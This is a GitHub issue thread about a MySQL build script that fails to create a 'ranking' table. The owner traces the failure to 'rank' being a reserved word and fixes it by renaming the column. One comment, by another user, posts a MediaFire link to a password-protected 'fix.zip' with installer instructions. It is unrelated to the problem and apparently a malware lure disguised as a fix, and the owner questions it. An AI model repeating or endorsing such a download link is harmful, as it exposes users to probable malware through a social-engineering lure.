### ISSUE TITLE
ranking table failed to be create by the build.sql script.

### ISSUE THREAD

**Issue by MaeTor** [MaeTor/soccer-championship-management-website#2]
verification using `show tables;` in the mysql command line client:
<img width="145" alt="gitIssue2" src="https://github.com/user-attachments/assets/4e24d6b5-3826-4fc3-8dc3-26b6598fa1ed">

script:
<img width="318" alt="gitIssue2a)" src="https://github.com/user-attachments/assets/bb8c497b-c738-4107-9f9b-5bae5d16d2c9">

one has to verify the implementation of the table "ranking".

PS: `Get-Content database/build.sql | mysql -u root -p soccer` used (instead of mysql -u root -p soccer< database/build.sql) to create the tables

**Comment by MaeTor** [comment]
I noticed that rank is a reserved word in MySQL language.

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MaeTor** [comment]
https://github.com/MaeTor/soccer-championship-management-website/issues/2#issuecomment-2314924065

Why this mediafire file is made for ?

**Comment by MaeTor** [comment]
I replaced "rank" with "position" in the table ranking.

**Comment by MaeTor** [comment]
<img width="145" alt="gitIresolved2" src="https://github.com/user-attachments/assets/209f06cd-dd36-49c2-9455-e5145625665b">
